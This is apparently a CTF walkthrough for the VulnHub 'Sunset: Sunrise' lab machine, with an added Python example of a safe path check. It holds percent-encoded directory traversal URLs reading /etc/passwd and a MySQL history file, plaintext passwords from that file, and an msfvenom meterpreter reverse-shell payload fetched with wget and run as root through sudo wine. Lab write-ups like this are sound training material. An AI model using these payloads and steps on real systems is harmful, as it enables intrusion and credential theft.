PJzhang: VulnHub target machine, sunset series, SUNSET: SUNRISE

Morning~~~

 

Address: http://www.vulnhub.com/entry/sunset-sunrise,406/

Focus on the tools and the approach.

nmap 192.168.43.0/24
Target machine IP
192.168.43.11

nmap -A -p1-65535 192.168.43.11

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)

http://192.168.43.11/
http://192.168.43.11:8080/ reveals Weborf/0.12.2 (GNU/Linux)

Weborf/0.12.2 has a directory traversal vulnerability
https://www.exploit-db.com/exploits/14925

View the user list
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Note these entries
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash

View the home directories; they belong to exactly the two users above
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf

The following files are accessible
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile


http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
This shows ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc
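
Added example, not from the original walkthrough and not Weborf's own code: every traversal request above carries ..%2f instead of ../, so a filter that inspects the path before percent-decoding never sees the dot-dot segments. The code contrasts such a hypothetical filter (naive_resolve) with a check that decodes, canonicalizes and then enforces containment in an assumed document root (DOC_ROOT, safe_resolve).

```python
import os
from urllib.parse import unquote

DOC_ROOT = "/var/www/html"  # assumed document root, not taken from the page


def naive_resolve(raw_path):
    """Hypothetical flawed handler: rejects '../' BEFORE percent-decoding."""
    if "../" in raw_path:
        return None
    decoded = unquote(raw_path)  # '..%2f' turns into '../' only after the check
    return os.path.normpath(os.path.join(DOC_ROOT, decoded.lstrip("/")))


def safe_resolve(raw_path):
    """Decode once, canonicalize, then require the result to stay in DOC_ROOT."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        return None
    root = os.path.realpath(DOC_ROOT)
    # realpath collapses '..' segments and follows symlinks that exist on disk
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None  # resolved outside the document root: refuse to serve
    return candidate


if __name__ == "__main__":
    # Request paths in the shape used on this page, plus one benign request
    samples = [
        "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
        "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history",
        "/index.html",
    ]
    for path in samples:
        print(path, "| naive:", naive_resolve(path), "| safe:", safe_resolve(path))
```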

ssh [email protected], enter iheartrainbows44, and you are logged in

uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux

mysql -uweborf -p, the password is again iheartrainbows44

show databases;
use mysql;
show tables;
select Host,User,Password from user;

localhost | sunrise | thefutureissobrightigottawearshades

su sunrise, enter the password thefutureissobrightigottawearshades, and the prompt becomes sunrise@sunrise:/home/weborf$

sudo -l
This shows (root) /usr/bin/wine

Privilege escalation information gathering script
https://github.com/sleventyeleven/linuxprivchecker

msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe

python3 -m http.server 80

On the target machine
wget http://192.168.43.154/muma.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

sudo /usr/bin/wine muma.exe
Password: thefutureissobrightigottawearshades

A shell is obtained directly
meterpreter >

cd /root
cat root.txt
24edb59d21c273c033aa6f1689b0b18c

Alternatively, run sudo /usr/bin/wine cmd.exe directly on the target machine
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c

 
